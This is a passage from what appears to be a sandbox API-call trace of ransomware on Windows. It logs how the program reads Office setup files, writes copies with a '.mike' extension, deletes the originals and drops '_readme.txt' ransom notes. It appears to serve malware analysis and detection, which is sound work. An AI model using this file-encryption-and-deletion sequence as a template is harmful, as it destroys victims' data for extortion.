Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.608] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.608] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.609] GetFileType (hFile=0x288) returned 0x1 [0052.609] GetFileType (hFile=0x288) returned 0x1 [0052.609] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0052.610] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2202ac0 | out: lpFileInformation=0x2202ac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd658ff0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391)) returned 1 [0052.610] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.610] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.611] GetFileType (hFile=0x288) returned 0x1 [0052.611] GetFileType (hFile=0x288) returned 0x1 [0052.611] ReadFile (in: hFile=0x288, lpBuffer=0x2204208, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2204208*, lpNumberOfBytesRead=0x2af038*=0x391, lpOverlapped=0x0) returned 1 [0052.612] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.612] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.612] GetFileType (hFile=0x288) returned 0x1 [0052.613] GetFileType (hFile=0x288) returned 0x1 [0052.613] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0052.613] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.613] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.613] GetFileType (hFile=0x288) returned 0x1 [0052.613] GetFileType (hFile=0x288) returned 0x1 [0052.614] WriteFile (in: hFile=0x288, lpBuffer=0x220b918*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x220b918*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.614] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a6f5c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a6f5c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a6f5c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5c0)) returned 1 [0052.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike", lpFilePart=0x0) returned 0x6f [0052.615] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x220d2e8 | out: lpFileInformation=0x220d2e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a6f5c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a6f5c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a6f5c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5c0)) returned 1 [0052.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.615] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", dwFileAttributes=0x80) returned 1 [0052.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.615] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 1 [0052.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.616] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpFilePart=0x0) returned 0x6a [0052.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\_readme.txt", lpFilePart=0x0) returned 0x68 [0052.616] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0052.616] GetFileType (hFile=0x288) returned 0x1 [0052.616] GetFileType (hFile=0x288) returned 0x1 [0052.617] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.618] GetFileType (hFile=0x288) returned 0x1 [0052.618] GetFileType (hFile=0x288) returned 0x1 [0052.618] CloseHandle (hObject=0x288) returned 1 [0052.618] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.619] GetFileType (hFile=0x288) returned 0x1 [0052.619] GetFileType (hFile=0x288) returned 0x1 [0052.619] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0052.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.620] GetFileType (hFile=0x288) returned 0x1 [0052.620] GetFileType (hFile=0x288) returned 0x1 [0052.620] ReadFile (in: hFile=0x288, lpBuffer=0x22139a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22139a0*, lpNumberOfBytesRead=0x2af038*=0x5ac, lpOverlapped=0x0) returned 1 [0052.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.622] GetFileType (hFile=0x288) returned 0x1 [0052.622] GetFileType (hFile=0x288) returned 0x1 [0052.622] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0052.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.622] GetFileType (hFile=0x288) returned 0x1 [0052.622] GetFileType (hFile=0x288) returned 0x1 [0052.623] WriteFile (in: hFile=0x288, lpBuffer=0x221bcec*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x221bcec*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0052.624] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 1 [0052.624] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml")) returned 1 [0052.625] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0052.626] GetFileType (hFile=0x288) returned 0x1 [0052.626] GetFileType (hFile=0x288) returned 0x1 [0052.627] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8a6f5c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a95720, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.627] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a6f5c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a6f5c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a6f5c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.XML.mike", cAlternateFileName="GROOVE~1.MIK")) returned 1 [0052.627] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a6f5c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a6f5c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a95720, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0052.627] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a6f5c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a6f5c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a95720, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0052.627] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a6f5c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a6f5c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a95720, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0052.627] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0052.627] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.627] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.627] CoTaskMemFree (pv=0x502980) [0052.628] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.628] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e345a0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.XML", cAlternateFileName="INFOPA~1.XML")) returned 1 [0052.629] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0052.629] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.629] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0052.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.629] GetFileType (hFile=0x288) returned 0x1 [0052.629] GetFileType (hFile=0x288) returned 0x1 [0052.629] CloseHandle (hObject=0x288) returned 1 [0052.629] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.630] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.632] GetFileType (hFile=0x288) returned 0x1 [0052.632] GetFileType (hFile=0x288) returned 0x1 [0052.632] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0052.633] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.633] GetFileType (hFile=0x288) returned 0x1 [0052.633] GetFileType (hFile=0x288) returned 0x1 [0052.633] ReadFile (in: hFile=0x288, lpBuffer=0x2227334, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2227334*, lpNumberOfBytesRead=0x2af038*=0x4cf, lpOverlapped=0x0) returned 1 [0052.634] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.634] GetFileType (hFile=0x288) returned 0x1 [0052.635] GetFileType (hFile=0x288) returned 0x1 [0052.635] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0052.635] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.635] GetFileType (hFile=0x288) returned 0x1 [0052.635] GetFileType (hFile=0x288) returned 0x1 [0052.636] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML", dwFileAttributes=0x80) returned 1 [0052.636] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common 